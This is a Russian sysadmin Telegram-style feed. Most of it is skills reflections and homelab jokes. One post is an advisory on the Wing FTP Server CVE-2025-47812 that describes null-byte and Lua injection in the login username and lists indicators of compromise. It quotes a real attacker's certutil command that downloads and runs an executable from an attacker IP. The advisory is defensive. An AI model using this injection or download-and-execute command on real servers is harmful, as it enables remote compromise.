☕️ Недавно с коллегами за чашкой кофе зашел у нас разговор о том, что же на самом деле делает сисадмина хорошим сисадмином? Роль у нас у всех многогранная, но мы попытались вывести три самых главных, универсальных навыка.

С практической точки зрения, мы сошлись на том, что нужно уметь документировать, автоматизировать и, что крайне важно, выводить из эксплуатации. Причем один мудро заметил, что порядок тут даже важнее, т.е. сначала грамотно выводим из эксплуатации старый хлам, потом документируем то, что осталось, и только потом автоматизируем. Ведь недокументированная, но чистая и понятная среда куда лучше, чем идеально описанный зоопарк из легаси-систем, который страшно трогать.

Но сошлись мы и на том, что чисто технические навыки лишь половина дела. Гораздо важнее оказались софт-скилзы, которые отличают просто исполнителя от настоящего инженера. Это, во-первых, умение учиться – постоянно и самостоятельно. Во-вторых, умение решать проблемы, то есть мыслить логически и методично, а не просто перебирать варианты. И в-третьих, что, возможно, самое сложное для многих, – умение вовремя просить о помощи. Никто не может знать всё, но хороший админ всегда знает, где найти ответ и не боится признать, что зашел в тупик. А еще важно быть человеком, с которым приятно работать, а не токсиком, отравляющим атмосферу в коллективе 😡

В итоге, получается, что идеальный сисадмин состоит из сплава технической дисциплины, умения постоянно учиться и человеческих качеств. Эти навыки позволяют пройти главный экзамен на профпригодность: настроить всё, задокументировать и уйти в отпуск так, чтобы никто не стрессовал (ни админ, ни коллеги).

Типичный 🥸 Сисадмин

Сервер в шкафу спальни. Классика хоумлаба 🔊

Сначала ты хочешь просто поднять свой маленький VPN и файлопомойку, а через год твоя одежда особенно пахнет, плюс ты привык сладко засыпать под убаюкивающий рокот турбин.

Типичный 🥸 Сисадмин

Что-то даже захотелось выйти и продышаться после этого принесенного пк 🫁

Типичный 🏥 Сисадмин

🧠 UX на минималках, доход — на максималках.

Хитрые разрабы.

Типичный 😶 Сисадмин

Некоторые костыли становятся несущей конструкцией 🎩

Типичный 🌚 Сисадмин

С каждым могло быть 🛌

Типичный 🥸 Сисадмин

Переход от софтверщика к хардверщику произошёл успешно. Зато не троттлит.

Типичный 🥸 Сисадмин

🔥 Wing FTP Server под атакой. Разбор уязвимости и комедия ошибок от хакеров.

Новость для всех, кто использует Wing FTP Server. В нем обнаружена критическая уязвимость CVE-2025-47812, которая позволяет удаленно выполнить код с правами SYSTEM/root.

Уязвимость уже активно эксплуатируется, так что если у вас развернут этот сервер, необходимо обновиться до версии 7.4.4.

Технически, уязвимость представляет собой комбинацию из инъекции нулевого байта (%00) и инъекции кода на языке Lua в параметре имени пользователя при аутентификации (через loginok.html). Атакующий может отправить специально сформированный запрос, используя учетную запись, для которой известен пароль (или анонимную, если она включена). Полезная нагрузка в поле username выглядит примерно так: `` имя_пользователя%00]]...вредоносный_Lua_код...-- ``. Нулевой байт обрывает обработку строки с именем, ]] корректно закрывает синтаксис объекта сессии, а -- комментирует остаток оригинального кода. В результате вредоносный Lua-код записывается в файл сессии на сервере (файл с расширением .lua в директории session). При следующем обращении к серверу (например, при запросе страницы dir.html) он считывает этот файл, десериализует данные и выполняет внедренный код.

Признаки взлома можно найти в логах сервера (Log\Domains\) — ищите обрезанные записи вида `` User 'anonymous `` (без закрывающей кавычки). Более надежный способ — проверить файлы сессий в директории session на аномально большой размер или наличие подозрительного Lua-кода (например, функций для hex-декодирования или вызова io.popen). Один из реальных пейлоадов, который обнаружили исследователи, выглядел так: `` certutil -urlcache -f http://[IP_АТАКУЮЩЕГО]/[payload.exe] %TEMP%\mvveiWJHx.exe & start /B %TEMP%\mvveiWJHx.exe ``.

А теперь самое интересное как это выглядело на практике. Аналитики из Huntress разобрали реальную атаку и выяснили, что уязвимостью воспользовались, мягко говоря, не самые опытные хакеры. Их действия были похожи на комедию ошибок: они запускали базовые команды для разведки (ipconfig, whoami), пытались создавать пользователей с паролями вроде 123123qweqwe, делали опечатки в путях к файлам (например, c:^A.exe, где ^A — это управляющий символ SOH), пытались запустить встроенную команду dir как внешний бинарник и не смогли правильно составить curl-команду для скачивания своего же бэкдора. В конце концов, они попытались скачать и запустить пейлоад с помощью certutil, но его тут же удалил Microsoft Defender (Trojan:Win32/Ceprolad.A). После этого процесс WFTPServer.exe упал, и сессия атакующих оборвалась 😂😂

Эх, а ведь были прекрасные нулевые, когда для взлома сервера нужно было быть настоящим гением. А теперь достаточно просто найти готовый эксплойт на GitHub и уметь правильно скопировать команду... хотя, как видно, даже с последним у некоторых проблемы 😬

Типичный 🥸 Сисадмин